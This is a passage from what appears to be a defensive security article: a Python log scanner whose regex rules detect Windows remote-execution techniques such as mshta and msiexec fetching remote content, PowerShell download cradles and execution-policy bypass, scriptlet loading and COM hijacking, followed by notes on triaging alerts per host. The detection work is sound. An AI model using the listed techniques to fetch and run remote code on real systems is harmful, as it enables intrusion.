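    ("mshta_remote_or_inline",     r"\bmshta(?:\.exe)?\s+(?:https?://|vbscript:|javascript:)"),
    ("msiexec_remote_package",     r"\bmsiexec(?:\.exe)?\b.*/i\s+https?://"),
    ("rundll32_javascript",        r"\brundll32(?:\.exe)?\b.*javascript:"),
    ("powershell_download_cradle", r"\bpowershell(?:\.exe)?\b.*(?:DownloadString|DownloadFile|Invoke-Expression|\bIEX\b)"),
    ("powershell_policy_bypass",   r"\bpowershell(?:\.exe)?\b.*-ExecutionPolicy\s+Bypass\b"),
    ("script_host_remote_sct",     r"\b[cw]script(?:\.exe)?\b.*\bscript:https?://"),
    ("pubprn_scriptlet",           r"\bpubprn\.vbs\b.*\bscript:"),
    ("msbuild_unc_project",        r"\bmsbuild(?:\.exe)?\b.*\\\\[^\s\\]+\\"),
    ("com_hijack_registry",        r"\breg(?:\.exe)?\s+add\b.*\\CLSID\\\{[0-9a-f-]+\}\\(?:TreatAs|ScriptletURL)\b"),
    ("debug_hex_rebuild",          r"\bdebug(?:\.exe)?\s*<\s*\S+"),
    ("ftp_scripted_session",       r"\bftp(?:\.exe)?\b.*\s-s:\S+"),
]
COMPILED = [(name, re.compile(rx, re.I)) for name, rx in RULES]


def parse_record(line: str) -> Dict[str, str]:
    """Split one pipe-delimited record; the command line may itself contain pipes."""
    ts, host, user, parent, cmd = line.split("|", 4)
    return {"ts": ts, "host": host, "user": user, "parent": parent, "cmd": cmd}


def match_rules(cmd: str) -> List[str]:
    """Names of every rule whose pattern occurs in the command line."""
    return [name for name, rx in COMPILED if rx.search(cmd)]


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """One alert per (record, matching rule) pair."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        for name in match_rules(rec["cmd"]):
            alerts.append({**rec, "rule": name})
    return alerts


def count_by_rule(alerts: List[Dict[str, str]]) -> Dict[str, int]:
    return dict(Counter(a["rule"] for a in alerts))


def hosts_by_alert_count(alerts: List[Dict[str, str]]) -> List[tuple]:
    """Hosts ordered by how many alerts they produced, most first."""
    return Counter(a["host"] for a in alerts).most_common()


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(f'{a["ts"]} {a["host"]} {a["user"]} [{a["rule"]}] {a["cmd"]}')
    print(count_by_rule(found))
    print(hosts_by_alert_count(found))
```

The pubprn.vbs record deliberately fires two rules (the generic script-host rule and the pubprn-specific one), which is the behaviour you want from overlapping rules: the specific rule names the technique, the generic one still catches a variant that uses a different proxy script. Per-host counts are what turns a list of single hits into a triage queue, since the techniques in this article are typically chained on one machine within minutes.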

0x04 References

https://evi1cg.me/archives/remote_exec.html